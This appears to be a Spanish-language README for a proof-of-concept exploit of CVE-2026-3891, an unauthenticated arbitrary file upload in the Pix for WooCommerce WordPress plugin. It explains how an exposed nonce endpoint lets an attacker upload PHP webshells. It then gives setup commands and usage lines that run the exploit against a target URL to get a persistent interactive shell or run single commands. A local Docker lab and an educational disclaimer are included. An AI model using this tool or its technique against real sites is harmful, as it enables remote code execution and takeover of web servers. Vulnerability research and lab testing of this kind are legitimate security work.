
Pix for WooCommerce <= 1.5.0 - Carga arbitraria de archivos sin autenticación (CVE-2026-3891) PoC
CVE-2026-3891 es una vulnerabilidad de subida de archivos arbitraria no autenticada en el plugin de WordPress Pix for WooCommerce. El plugin expone un endpoint AJAX (lkn_pix_for_woocommerce_c6_save_settings) que acepta subidas de archivos de certificado sin autenticación alguna. Se puede obtener un nonce sin autenticación a través de un segundo endpoint expuesto (lkn_pix_for_woocommerce_generate_nonce), lo que permite a un atacante totalmente no autenticado subir archivos arbitrarios — incluyendo webshells PHP — directamente a la raíz web.
Versiones afectadas: payment-gateway-pix-for-woocommerce <= 1.5.0
--commandgit clone https://github.com/joshuavanderpoll/CVE-2026-3891.git
cd CVE-2026-3891
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
git clone https://github.com/joshuavanderpoll/CVE-2026-3891.git
cd CVE-2026-3891
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python3 CVE-2026-3891.py --url <TARGET_URL> [--command <CMD>] [--timeout <SECONDS>] [--useragent <UA>]
Explota el objetivo y accede a una sesión de shell interactiva persistente para ejecutar múltiples comandos.
python3 CVE-2026-3891.py --url 'https://target.com'

Ejecuta un único comando en el objetivo y muestra la salida, útil para scripting o comprobaciones rápidas.
python3 CVE-2026-3891.py --url 'https://target.com' --command whoami
Comando único
Un entorno Docker Compose autocontenido con el software vulnerable para pruebas locales. Consulta DOCKER.md para más detalles
cd docker/
docker compose up -d
python3 CVE-2026-3891.py --url 'http://localhost:8080'
Esta herramienta se proporciona únicamente con fines educativos y de investigación. El creador no asume ninguna responsabilidad por el mal uso o los daños causados por esta herramienta.